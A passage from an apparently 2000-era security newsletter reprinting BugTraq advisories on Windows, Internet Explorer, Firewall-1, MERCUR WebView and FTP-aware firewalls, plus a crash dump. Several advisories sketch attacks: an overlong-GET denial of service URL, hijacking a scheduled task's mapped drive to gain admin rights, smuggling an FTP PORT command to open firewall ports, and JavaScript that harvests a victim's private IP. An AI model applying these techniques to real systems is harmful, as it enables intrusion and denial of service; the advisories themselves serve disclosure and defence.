correctly parsing and handling commands or arbitrary messages sent to the OfficeScan client. Trend Micro has implemented MD5 Message-Digest Algorithm to ensure that the commands between the server and the clients can not be decrypted or captured to be replayed to other clients. For details about the MD5 encryptionalgorithm see: http://theory.lcs.mit.edu/~rivest/rfc1321.txt Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.5 Trend OfficeScan for Microsoft SBS 4.5 Patch Availability ================== - http://www.antivirus.com/download/ofce_patch.htm More Information ============ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_35.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported release. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm @HWA 102.0 HNS:MS Security bulletin#17 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words. ... MS Security bulletin#17 Posted to BugTraq on March 17, 2000 Microsoft Security Bulletin (MS00-017) -------------------------------------- Patch Available for "DOS Device in Path Name" Vulnerability Originally Posted: March 16, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words. Frequently asked questions regarding this vulnerability can be foundat http://www.microsoft.com/technet/security/bulletin/fq00-017.asp. Issue ===== DOS device names are reserved words, and cannot be used as folder or file names. When parsing a reference to a file or folder, Windows correctly checks for the case in which a single DOS device name is used in the path, and treats it as invalid. However, it does not check for the case in which the path includes multiple DOS device names. When Windows attempts to interpret the device name as a file resource, it performs an illegal resource access that usually results in a crash. Because it is not possible to create files or folders that contain DOSdevice names, it would be unusual for a user to try to access one under normal circumstances. The chief threat posed by this vulnerability is that a malicious user could attempt to entice a user to attempt such an access. For instance, if a web site operator hosted a hyperlink that referenced such a path, clicking the link would result in the user's machine crashing.Likewise, a web page or HTML mail that specified a local file as the source of rendering information could cause the user's machine to crash when it was displayed. If this happened, the machine could be put back into normalservice by restarting it. Affected Software Versions ========================== - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98 Second Edition Patch Availability ================== - Windows 95: http://www.microsoft.com/downloads/release.asp?releaseID=19491 - Windows 98 and Windows 98 Second Edition: http://www.microsoft.com/downloads/release.asp?ReleaseID=19389 NOTE: Additional security patches are available at the Microsoft Download Center NOTE: The patch will be available shortly at the WindowsUpdate site. When this happens, we will modify the bulletin to provide additional information. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS00-017: Frequently Asked Questions, http://www.microsoft.com/technet/security/bulletin/fq00-017.asp - Microsoft Knowledge Base article Q256015 discusses this issue and will be available soon. - Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting MicrosoftTechnical Support is available at http://support.microsoft.com/support/contact/default.asp Revisions ========= - March 16, 2000: Bulletin Created. @HWA 103.0 HNS:Georgi Guninski security advisory #9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probablyothers) which allows executing arbitrary programs using .eml files.This may be exploited when browsing web pages or openining an email message in Outlook. ... Georgi Guninski security advisory #9 Posted to BugTraq on March 15, 2000 IE and Outlook 5.x allow executing arbitrary programs using .eml files Disclaimer: The opinions expressed in this advisory and program are my own and notof any company.The usual standard disclaimer applies, especially the fact that GeorgiGuninski is not liable for any damages caused by direct or indirect useof the information or functionality provided by this program.Georgi Guninski, bears NO responsibility for content or misuse of thisprogram or any derivatives thereof. Description: There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probablyothers) which allows executing arbitrary programs using .eml files.This may be exploited when browsing web pages or openining an emailmessage in Outlook.This may lead to taking control over user's computer.It is also possible to read and send local files. Details: The problem is creating files in the TEMP directory with known name andarbitrary content.One may place a .chm file in the TEMP directory which contains the"shortcut" command and when the .chm file is opened with the showHelp()method programs may be executed. This vulnerability may be exploited by HTML email message in Outlook. Demonstration which starts Wordpad: http://www.nat.bg/~joro/eml.html (Note: George seems to have pulled the script, it gives a 404 now .. - Ed/Cruci) Workaround: Disable Active Scripting. Copyright 2000 Georgi Guninski 103.1 PSS:More MSIE crashing info by NtWakO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packet Storm Security http://packetstorm,securify.com/ --[Tuesday, March 21, 2000 by NtWaK0 / biteraser]------------------------------ --[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY* Object]--- --[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too ?]------- Here is the story, while having a chat (IRC) with biteraser today heh, he suddenly said *fu*k* hrm... I said what is wrong He said I JUST CRASHED IE.. After some investigation it turned about to be the *HISTORY* Object :). So if you cut and past the html code in a file, then open it with IE, you will be able to see the crash. Note: key line is: , without it IEt won't crash and behavior should be #default. It can be exploited more. --[SNIP]-------------------------------------------------------------------- --- Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx --[SNIP]-------------------------------------------------------------------- --- NOTE: Crash Memory dump. Application exception occurred: App: exe\iexplore.dbg (pid=219) When: 3/21/2000 @ 12:52:24.60 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: INFOSEC-BRAIN User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 6 Stepping 10 Windows Version: 4.0 Current Build: 1381 Service Pack: 6 Current Type: Uniprocessor Free Registered Organization: NtWaK0 Registered Owner: NtWaK0 (00400000 - 00412000) exe\iexplore.dbg (77f60000 - 77fbe000) dll\ntdll.dbg (77f00000 - 77f5e000) dll\kernel32.dbg (77e70000 - 77ec5000) dll\user32.dbg (77ed0000 - 77efc000) dll\gdi32.dbg (77dc0000 - 77dff000) dll\advapi32.dbg (77e10000 - 77e67000) dll\rpcrt4.dbg (70bd0000 - 70c19000) SHLWAPI.dbg (71500000 - 71610000) SHDOCVW.dbg (00760000 - 007e9000) COMCTL32.dbg (77c40000 - 77d7b000) dll\shell32.dbg (71740000 - 71740000) (22000000 - 22000000) (77b20000 - 77bd7000) dll\ole32.dbg (71050000 - 71118000) BROWSEUI.dbg (717b0000 - 717b0000) (779b0000 - 779b9000) dll\linkinfo.dbg (77720000 - 77731000) dll\mpr.dbg (77a40000 - 77a4d000) dll\ntshrui.dbg (78000000 - 78040000) (77800000 - 7783a000) dll\netapi32.dbg (77840000 - 77849000) dll\NetRap.dbg (777e0000 - 777ed000) dll\samlib.dbg (65340000 - 653d2000) oleaut32.dbg (70290000 - 702fe000) URLMON.dbg (77a90000 - 77a9b000) dll\version.dbg (779c0000 - 779c8000) dll\lz32.dbg (77bf0000 - 77bf7000) dll\rpcltc1.dbg (70410000 - 70492000) MLANG.dbg (70000000 - 70242000) MSHTML.dbg (01700000 - 01772000) WININET.dbg (48080000 - 48080000) (76ab0000 - 76ab5000) dll\imm32.dbg (70f00000 - 70f1a000) dll\iepeers.dbg State Dump for Thread Id 0xd2 eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000 edi=80004005 eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 function: Ordinal158 70bd180d 8b542408 mov edx,[esp+0x8] ss:0129808f=???????? 70bd1811 56 push esi 70bd1812 8b742408 mov esi,[esp+0x8] ss:0129808f=???????? FAULT ->70bd1816 0fb706 movzx eax,word ptr [esi] ds:00000000=???? 70bd1819 46 inc esi 70bd181a 46 inc esi 70bd181b 83f841 cmp eax,0x41 70bd181e 7c05 jl Ordinal158+0x18 (70bd1825) 70bd1820 83f85a cmp eax,0x5a 70bd1823 7e1d jle Ordinal158+0x35 (70bd1842) 70bd1825 0fb70a movzx ecx,word ptr [edx] ds:70f01ef4=0043 70bd1828 42 inc edx 70bd1829 42 inc edx 70bd182a 83f941 cmp ecx,0x41 70bd182d 7c05 jl Ordinal158+0x27 (70bd1834) *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158 000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog 000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog 00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog 00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog 00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog 00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog 0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60 MSHTML!DllGetClassObject 0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8 MSHTML!MatchExactGetIDsOfNames 00000000 00000000 00000000 00000000 00000000 00000000 MSHTML!MatchExactGetIDsOfNames *----> Raw Stack Dump <----* 00069688 0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70 ...pWm.p.......p 00069698 68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00 h.......@....... 000696a8 78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00 x..p..}......... 000696b8 38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00 8Y,.@.....}..... 000696c8 00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01 ...........p..}. 000696d8 00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00 ....4Z,.8Y,.@... 000696e8 40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00 @....Y,..@...... 000696f8 8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01 ...p....4Z,.8Y,. 00069708 40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00 @...0Y,.0Y,.`... 00069718 44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01 D......p....8Y,. 00069728 40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00 @...0Y,..Y,..... 00069738 10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00 .4,.. .p....`... 00069748 5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00 0 ]~.p.....Y,.|... 00069758 7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00 |.........\.C.r. 00069768 61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00 a.s.h._.A.L.L._. 00069778 49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00 I.E.4._.I.E.5._. 00069788 6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00 o.n._.W.i.n.d.o. 00069798 77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00 w.s._.9.x._.a.n. 000697a8 64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00 d._.A.l.l._.N.T. 000697b8 5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00 _.S.P.x._.w.i.t. State Dump for Thread Id 0xc6 eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30 edi=000872e8 eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 function: ZwReplyWaitReceivePort 77f67f9c b890000000 mov eax,0x90 77f67fa1 8d542404 lea edx,[esp+0x4] ss:01a7e7f7=???????? 77f67fa5 cd2e int 2e 77f67fa7 c21000 ret 0x10 77f67faa 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff ntdll!ZwReplyWaitReceivePort 00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate State Dump for Thread Id 0xee eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c edi=0008a2ec eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 function: NtDelayExecution 77f67914 b827000000 mov eax,0x27 77f67919 8d542404 lea edx,[esp+0x4] ss:0249e96f=???????? 77f6791d cd2e int 2e 77f6791f c20800 ret 0x8 77f67922 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution 0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep 00000000 00000000 00000000 00000000 00000000 00000000 iexplore! *----> Raw Stack Dump <----* 0126ff68 f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00 ...w....|.&..... 0126ff78 00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01 ......<.......&. 0126ff88 be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77 ...w`..........w 0126ff98 60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77 `......w.......w 0126ffa8 e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02 ...........w.... 0126ffb8 40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02 @....N.w........ 0126ffc8 40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01 @.......@.....&. 0126ffd8 00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77 ........D..w8..w 0126ffe8 00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77 ............m..w 0126fff8 e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00 ................ 01270008 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270018 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270028 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270038 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270048 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270058 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270068 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270078 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270088 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270098 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ State Dump for Thread Id 0xec eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4 edi=016fff78 eip=77f682db esp=016fff5c ebp=016fff80 iopl=0 ov up ei pl nz na po cy cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000a07 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:0292e963=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc ntdll!NtWaitForSingleObject 77f67610 4affc033 89257508 ff900c42 037d044a 520004c2 kernel32!WaitForSingleObject *----> Raw Stack Dump <----* 016fff5c a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01 ...w........x.o. 016fff6c 00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a .....$,.@u.w.D_. 016fff7c fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00 .....v.w7O.w.... 016fff8c c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00 .'.........p.... 016fff9c c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01 .'...,.w.$,...o. 016fffac 10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70 .$,....pP..w...p 016fffbc de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77 .N.w.$,..,.wP..w 016fffcc 10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00 .$,.P..w..o.T... 016fffdc ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00 ....D..w8..w.... 016fffec 00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01 ...........p.$,. 016ffffc 00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00 ....MZ.......... 0170000c ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00 ............@... 0170001c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0170002c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0170003c c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c ............!..L 0170004c cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63 .!This program c 0170005c 61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20 annot be run in 0170006c 44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00 DOS mode....$... 0170007c 00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4 ....c...'...'... 0170008c 27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4 '...'.......~... --[END]--------------------------------------------------------------------- --- Cheers, |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-| The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-| Live Well Do Good --:) Cheers, ------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ----------------------------------------------------------------- Live Well Do Good --:) @HWA 104.0 HNS:Drive Mappings in Interactive Login ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 Issue: Drive Mappings in Interactive Login affect Processes running in context of Schedule User. Points indicating this is a bug/security exploit and not by design (as somehave indicated to the author) ... Drive Mappings in Interactive Login Posted to BugTraq on March 15, 2000 Issue: Drive Mappings in Interactive Login affect Processes running in context of Schedule User. Points indicating this is a bug/security exploit and not by design (as somehave indicated to me) 1. Drive mappings are individual to each user, as seen by their location in the registry under HKCU\Network. This point alone indicates a bug. Why should the *personal* drive mappings of an interactive login session have *any* affect on a service running in a different user context, in a supposedly secure environment? They shouldn't, plain and simple. 2. KB Article Q130668 is the only article I could find which has any relationship to this issue, but it deals with a "bug" when the drives are mapped to Netware Volumes using GSNW. However, reading between the lines, one can see that the behavior described (which is identical in both Netware and NT drive mappings) is not by design, otherwise, why would they state this: Microsoft has confirmed this to be a problem in Windows NT Workstation and Server versions 3.5, 3.51, and 4.0... They do offer up a solution to one half of the problem - that is when the scheduled process leaves a mapped drive, which then affects any interactive processes by preventing the use of this drive (unless appropriate permissions exist for the interactive user). But they make no mention of the other half - that a non- privileged user can affect the environment of the scheduled process, which is often in a priviliged account context. Take the following scenario: A "secure" NT workstation is configured with scheduler running in a user context that has specific elevated rights in order to perform unattended administrative functions based on scripts that are stored on a server. But one of the tasks performed in these scripts requires a mapped drive letter; UNC paths won't work. So to be sure, the scripts begins by mapping a drive letter to the shared network resource containing the patches and updates placed there when required. Often these patches are security fixes and the like, and the scheduler dutifully applies them to some large number of machines as directed in the script. Here comes the exploit. If an interactive login is present, and the same drive letter is already mapped by a user, the net use in the scheduled script will fail, as will the required hotfix or update. Not a pretty picture in a large LAN whose security and stability may rely on timely installation of these updates. This is the simplest "exploit". Next we extend this a bit further: the user maps a drive letter in an interactive login, and places in it a script with the same filename as that called by the scheduled update, and makes sure the schedule user has permissions to this file and network resource. All of this could be performed by a non- privileged user. The schedule service will now execute this script in the elevated user context, and the script could be instructed to install a trojan, add the user to the local Admin group, or whatever. The bottom line is that this design flaw can be easily exploited to allow any user with interactive login rights to a workstation to elevate himself to the rights of the schedule user, which is often Administrator of the workstation. I have tested this on NT4 SP5 and 6a. (Note this is without IE5 installed, just the built in AT scheduler). I have also tested this with all combinations of Local and Domain accounts for both the scheduler and the interactive user. I have tested it with and without persistent drive mappings present for either user - in each case, whoever gets the login first gets the drive letter. @HWA 105.0 HNS:DoS Attack in MERCUR WebView ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0where they do not use proper bounds checking in the code who handle the GETcommands The following all result in a Denial of Service against the service in question. ... DoS Attack in MERCUR WebView Posted to BugTraq on March 15, 2000 USSR Advisory Code: USSR-2000036 Release Date: March 16, 2000 Systems Affected: MERCUR WebMail-Client Version 1.0 port (1080) THE PROBLEM UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0where they do not use proper bounds checking in the code who handle the GETcommands The following all result in a Denial of Service against the servicein question. Example: http://hostip:1080/mmain.html&mail_user=(buffer) Where [buffer] is aprox. 1000 characters. (0) Binary or source for this Exploit: http://www.ussrback.com/ Exploit: the Exploit, crash the remote machine service WebMail Vendor Status: informed Vendor Url: http://www.atrium-software.com Program Url: http://www.atrium-software.com/mercur/webview_e.html Credit: USSRLABS SOLUTION Noting yet. @HWA 106.0 HNS:Problem with Firewall-1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 The Dartmouth Collage security group has uncovered a problem withFirewall-1 which could lead to the protected site handing out more IPaddress info than intended. .. Problem with Firewall-1 Posted to BugTraq on March 15, 2000 The Dartmouth Collage security group has uncovered a problem withFirewall-1 which could lead to the protected site handing out more IPaddress info than intended. Under certain nominal load conditions (CPU less than 40%, 200+ activesessions) Firewall-1 will begin "leaking" packets with their privateaddress information in tact. The result is that the receiving site willreceive a SYN=1 that it will be unable to respond to. Once the clientattempts a resend, the target network (or anyone in the middle) can usethe source port information to enumerate the client's true IP address. Here is a Snort trace which has been sanitized and formatted for easierviewing: Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S***** Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S***** Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S***** Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S***** Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S***** Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S***** So the first packet goes out with the private address information stillin place and SYN=1. When the client does not receive a reply, itretransmits the SYN=1. Since FW-1 considers this to be part of the samesession, the same source port number is assigned. If the second packetgets translated properly (as in these traces) the source port info canpotentially be used to map the legal IP address to the private address. Of course the problem here is that a would be bad guy now knows theclient's true IP address. If enough hosts are recorded, its possiblethat most of the internal network address space could be enumerated. This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1 hasnot been checked but its expected that the same problem may exist. Wewhere able to reproduce the problem on a Nokia IP440 and NT. I've seenthis problem on Solaris 2.6 as well, but do not have the data to back upthe statement. A quick fix is to apply egress filtering to the border router and blockall private addressing that attempts to leak though. A how-to on egresscan be found at: http://www.sans.org/y2k/egress.htm Cheers all, Chris @HWA. 107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 Microsoft has just discovered a serious problem when a user attempts toinstall the 128-bit security patch for Internet Explorer 5.0, 5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package. After restartingthe system, users will not be able to logon to Windows 2000 ... Freeze Distribution of IE 5.0, 5.0a, and 5.0b Posted to BugTraq on March 15, 2000 Microsoft has just discovered a serious problem when a user attempts toinstall the 128-bit security patch for Internet Explorer 5.0, 5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package. After restartingthe system, users will not be able to logon to Windows 2000. The instructions to incorporate the 128-bit security patch into IEAKpackages say you should use the command line switches: "/q:a /r:n /n:v" The /n:v switch when used with ie5dom.exe (the 128-bit security patch for5.0x) causes important security files on Windows 2000 to be replaced witholder files, preventing users from logging on. Installations created using IEAK 5.0 for Windows 95, Windows 98, andWindows NT4 systems with the ie5dom.exe, and these command line parametersspecified, are not affected. It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b buildsthat incorporate the 128-bit security patch with these switches. Pleasetake immediate action to help prevent more customers from encounteringthis issue. Please checkhttp://www.microsoft.com/windows/ieak/en/support /faq/default.asp andMicrosoft Knowledge Base (KB) article Q255669 for updates to this issue. Note: It may take 24 hours from the original issuance of this bulletin forthe Microsoft Knowledge Base (KB) article related to this issue to bevisible. We sincerely apologize for this inconvenience and thank you in advance foryour help in protecting end users. Thank you, The IEAK Product Team Checking to see if you have included this command-line switch: To check a package for this issue: Open your IEAK package in the IEAK Wizard and go to the Custom Componentsscreen. Examine each custom component. If you have included ie5dom.exe asa custom component, check the command line switches for '/R:N /Q:A /N:V' *OR* If you don't have the IEAK Wizard available to you: 1) Extract your custom IE 5.0x package by running this command line:'ie5setup.exe /c /t:' 2) Browse to the directory. Open 'iesetup.cif' in Notepad. 3) Look for a section like this: [CUSTOM0] SectionType=Component DisplayName='128-bit Security' URL1='Ie5dom.exe',2 GUID=128PATCH Command1='Ie5dom.exe' Switches1='/R:N /Q:A /N:V' Type1=2 UninstallKey='' Version= Size=216 Platform=win95,win98,nt4,nt5, Modes='0,1,2' Details='128-bit Securiy' Group=CustItems Priority=500 UIVisible=0 4) Examine for: Switches1='/R:N /Q:A /N:V' If you have this switch listed, immediately freeze distribution of thispackage!!! @HWA 108.0 HNS:Extending the FTP "ALG" vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 It is possible to cause many firewalls to open arbitrary ports allowing external hosts to connect to "protected" clients. In this case, it is done by fooling the protected client into sending a specially crafted FTP request through the firewall, which it misinterprets as a legitimate FTP "PORT" command ... Extending the FTP "ALG" vulnerability Posted to BugTraq on March 15, 2000 Author: Mikael Olsson, EnterNet Sweden mikael.olsson@enternet.se Original Date: 2000-03-10 Originally posted to: Bugtraq, Vuln-dev (BID 1045) Vendor contacted: Nope, sorry, too many. Updated: 2000-03-14 - Added browser-specific info - Begun writing a list of firewalls expected to be vulnerable - Rewrote a couple of paragraphs that were causing much head scratching Synopsis It is possible to cause many firewalls to open arbitrary ports allowing external hosts to connect to "protected" clients. In this case, it is done by fooling the protected client into sending a specially crafted FTP request through the firewall, which it misinterprets as a legitimate FTP "PORT" command. Basic idea : how to open arbitrary ports against a client * Send a HTML email to an HTML-enabled mail reader containing the tag You could also conceivably plant a web page somewhere on a server containing this link. Please reference CERT advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests http://www.cert.org/advisories/CA-2000-02.html * Balance the number of A so that the PORT command will begin on a new packet boundary. This may also be done by having the server use a low TCP MSS to decrease the number of A's that one has to add. * The firewall in question will incorrectly parse the resulting RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139 as first a RETR command and then a PORT command and open port 139 against your address (1.2.3.4 in this case) * Now the server ftp.rooted.com can connect to the client on port 139. Ouch. Before you ask: No, it does not have to be port 139. It can be any port. Some firewalls disallow "known server ports" for these connections; such ports cannot be used, but I'm betting there are plenty other ports that can be used in such cases. Address translation playing games You have to know the IP address of the client in order to fool the firewall into opening the port. If the client is not dynamically NATed, this is easy. If the client IS dynamically NATed, this is a bit harder. How to make it work through address translation There are several ways to figure out what the private address is. Here's two: * Send an email to the address in question containing an img src ftp://ftp.rooted.com:23456 and hope that the firewall won't realise that port 23456 is FTP. PORT commands won't be translated this way, so the private IP adress will be exposed. This assumes that 23456 is allowed through the firewall and that it won't attempt to parse FTP command data on that port. * Send an email with a link to a web page that contains javascript that extracts the private IP address and posts it to the server. The javascript code below works on Netscape; I don't know what the equivalent is for MSIE. vartool=java.awt.Toolkit.getDefaultToolkit(); addr=java.net.InetAddress.getLocalHost(); ip=addr.getHostAddress(); Once we know about the IP address, we can adjust the img src so that it is valid for that specific internal client. The dynamic translation will also likely change the port number opened on the NAT:ed public address, but that's ok. All we have to do is have our fake FTP server read the command packet containing the PORT command, as changed by the firewall, and we'll know what public address and port to connect to in order to get to our desired port on the "protected" client. I think I've heard about reverse firewall penetration before Yeah, the idea of internal 